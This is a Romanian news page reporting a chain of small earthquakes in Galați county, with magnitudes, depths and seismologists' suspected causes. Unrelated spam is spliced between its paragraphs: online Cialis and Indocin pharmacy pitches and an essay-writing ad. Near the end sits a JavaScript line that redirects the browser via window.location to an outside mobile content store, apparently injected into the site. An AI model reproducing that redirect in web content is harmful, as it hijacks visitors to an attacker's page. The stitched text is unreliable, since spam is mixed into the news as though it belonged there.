Cutremure în lanţ în judeţul Galaţi. Ce cred seismologii

Seismologii monitorizează atent zonele din judeţul Galaţi care au fost zguduite în ultimele zile de mai multe cutremure. Cercetătorii încearcă astfel să identifice cauzele care au dus la producerea seismelor.cutre Cialis has always been a dependable medication for different cases of Erectile Dysfunction, and many men worldwide have trusted and can attest as to howВ 

Actualizare 09:30: Un cutremur cu magnitudinea de 3,8 pe scara Richter s-a produs luni dimineață în județul Galați, potrivit Institutului Național pentru Fizica Pământului (INFP).

Oct 17, 2015 – is order indocin legit online, buy Indocin with overnight delivery. Our Pharmacies is the most trusted online drug suppliers. You do not have toВ 

Seismul a avut loc la ora 08:02, la o adâncime de 5 kilometri și cu intensitatea în zona epicentrală III pe scara Mercali. Cele mai apropiate localități de epicentru au fost Galați (17 km), Brăila (30 km), Măcin (38 km), Tecuci (51 km) și Focșani (56 km).

Cercetătorii de la Institutul de Fizică a Pământului au montat aparatură de monitorizare a mişcărilor telurice în trei locuri. Potrivit acestora, ar putea fi vorba de mai mulţi factori care au generat cutremurele.

best on-line essay writing site

Unul este instabilitatea solului. De vină ar putea fi şi inundaţiile din ultimele săptămâni şi, nu în ultimul rând, exploatările petroliere din zonă. Mai mulţi localnici s-au plâns că sub pământul pe care sunt ridicate casele se aud bubuituri, iar terenul se zguduie.

Dacă se va confirma că alunecările de teren sunt de vină, populaţia va fi evacuată. Primele concluzii sunt aşteptate peste două săptămâni.

Şapte cutremure cu magnitudini cuprinse între 3 şi 3,9 s-au produs, în ultima săptămână, în zona Galaţi. Ultimul şi cel mai puternic a avut loc ieri, în jurul orei 18.10, la o adâncime de 5 kilometri.

sursa: http://ro.stiri.yahoo.com

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *